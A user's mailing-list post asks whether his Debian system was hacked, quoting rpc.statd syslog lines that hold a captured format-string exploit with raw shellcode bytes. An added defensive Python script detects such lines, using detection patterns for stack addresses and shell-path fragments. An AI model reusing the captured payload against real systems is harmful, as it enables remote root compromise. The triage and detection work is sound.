Have I been hacked?
Hi,
Looking at the system logs for my Potato system (it was Slink, but I
apt-get upgraded), I see some unusual entries. From messages.0:
Dec 31 05:29:18 marvin 173>Dec 31 05:29:18 /sbin/rpc.statd[300]:
gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff6ec
804a174400f0078687465676274736f6d616e797265206520726f7220726f66
bffff718
bffff719 bffff71a
bffff71b???????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
Dec 31 05:29:18 marvin ????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ??Î?Ã1É°?Í?þÁ°?Í?þÁ°?Í?Ç^F/binÇF^D/shA0À?F^G?v^L
V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
(excuse the stupid reformatting that Bloatus Notes does - but I had to
use my work machine for this note since I know that it is secure)
Same kind of error in syslog.0:
Dec 31 05:29:18 marvin syslogd: Cannot glue message parts together
Dec 31 05:29:18 marvin 173>Dec 31 05:29:18 /sbin/rpc.statd[300]:
gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿bffff6ec
804a174400f0078687465676274736f6d616e797265206520726f7220726f66
bffff718
bffff719 bffff71a
bffff71b???????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
Dec 31 05:29:18 marvin ????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????????????????
1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ??Î?Ã1É°?Í?þÁ°?Í?þÁ°?Í?Ç^F/binÇF^D/shA0À?F^G?v^L
V^P?N^L?ó°^KÍ?°^AÍ?èÿÿÿ
From setuid.changes:
marvin changes to setuid programs and devices:
--- setuid.today Fri Dec 29 06:32:04 2000
+++ /var/log/setuid.new.tmp Sun Dec 31 06:32:01 2000
@@ -1,5 +1,4 @@
- 2 620 1 pgmr tty 0 Fri Dec 29 02:31:09
2000 /dev/pts/0
- 3 620 1 pgmr tty 0 Fri Dec 29 01:43:39
2000 /dev/pts/1
+ 2 620 1 pgmr tty 0 Sun Dec 31 05:29:18
2000 /dev/pts/0
4120 4755 2 root root 499916 Wed Mar 8 01:51:40
2000 /usr/bin/sperl5.00405
4120 4755 2 root root 499916 Wed Mar 8 01:51:40
2000 /usr/bin/suidperl-5.004
4122 4755 1 root staff 4787 Sat Jan 15 09:30:29
2000 /usr/local/bin/dflt_routes
I was logged on and had an xterm running from midnight 12/31 - but I
definitely wasn't doing anything at 5:30 in the morning.
Would this be due to a hack attempt? How can I tell if this was
successful? I shut down the system after I detected this and haven't booted
it up since, but any suggestions on what to do once I bring it up again?
Thanks,
Kenneth
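As an added example for readers triaging logs like the ones quoted in this post (it is not part of the original message and not a Debian tool), the following script scans syslog extracts for rpc.statd "gethostbyname error for" messages whose "hostname" does not look like a hostname at all. The heuristics follow what is visible above: caret sequences such as ^X÷ÿ¿ are the Latin-1 bytes 0x18 0xf7 0xff 0xbf, which read little-endian as the address 0xbffff718 that also appears in hex further along the line, so runs of bffffxxx values, long runs of '?' (bytes syslog could not render), "/bin" and "/sh" fragments, and syslogd's own "Cannot glue message parts together" line are all flagged. The sample lines are constructed to imitate the post, and the bffff-prefix check is a heuristic for i386 Linux stack addresses of that era, not a general rule.

```python
import re
import string

# Constructed sample lines (not the poster's own logs). Line 2 imitates what the
# post shows: a leaked syslog priority prefix, caret-escaped control bytes,
# hex stack addresses, a run of '?' and "/bin" "/sh" fragments.
SAMPLE_LOG = [
    "Dec 31 05:10:02 marvin /sbin/rpc.statd[300]: gethostbyname error for nfs-client.example.net",
    "Dec 31 05:29:18 marvin 173>Dec 31 05:29:18 /sbin/rpc.statd[300]: "
    "gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbfbffff6ec bffff718 bffff719 "
    + "?" * 80 + "1\xc0\xeb|/bin/shA0\xc0",
    "Dec 31 05:29:18 marvin syslogd: Cannot glue message parts together",
    "Dec 31 06:32:01 marvin CRON[412]: (root) CMD (/usr/sbin/checksecurity)",
]

STATD_RE = re.compile(r"rpc\.statd\[(\d+)\]: gethostbyname error for (.*)$")
# Characters a legitimate hostname or dotted IP can contain.
HOSTNAME_OK = set(string.ascii_letters + string.digits + ".-")
# Heuristic: i386 Linux user stack addresses of the era start with 0xbffff.
STACK_ADDR_RE = re.compile(r"bffff[0-9a-f]{3}")
GLUE_ERROR = "Cannot glue message parts together"


def hostname_findings(name):
    """Return a list of reasons why `name` does not look like a real hostname."""
    findings = []
    if len(name) > 255:
        findings.append("longer than a legal hostname (255)")
    bad = [c for c in name if c not in HOSTNAME_OK]
    if bad:
        findings.append(f"{len(bad)} chars outside [A-Za-z0-9.-]")
    if "?" * 8 in name:
        findings.append("run of '?' (bytes syslog could not render)")
    addrs = STACK_ADDR_RE.findall(name)
    if len(addrs) >= 2:
        findings.append(f"{len(addrs)} stack-looking addresses (bffff...)")
    if "/bin" in name or "/sh" in name:
        findings.append("shell path fragment in hostname")
    return findings


def scan(lines):
    """Scan syslog lines; return one finding record per suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        stamp = line[:15]  # "Mon DD HH:MM:SS" prefix of classic syslog lines
        if GLUE_ERROR in line:
            hits.append({"line": n, "time": stamp, "pid": None,
                         "reasons": ["syslogd could not reassemble an over-long or malformed message"]})
            continue
        m = STATD_RE.search(line)
        if not m:
            continue
        reasons = hostname_findings(m.group(2))
        if reasons:
            hits.append({"line": n, "time": stamp, "pid": int(m.group(1)), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']} at {hit['time']} (pid {hit['pid']}):")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Run it against a real file with `scan(open("/var/log/syslog.0", errors="replace").read().splitlines())`; the benign lookup failure on line 1 produces nothing, while the line imitating the post is reported with several independent reasons, and the syslogd glue error is reported at the same timestamp, which is the correlation worth checking against the setuid report's timestamps.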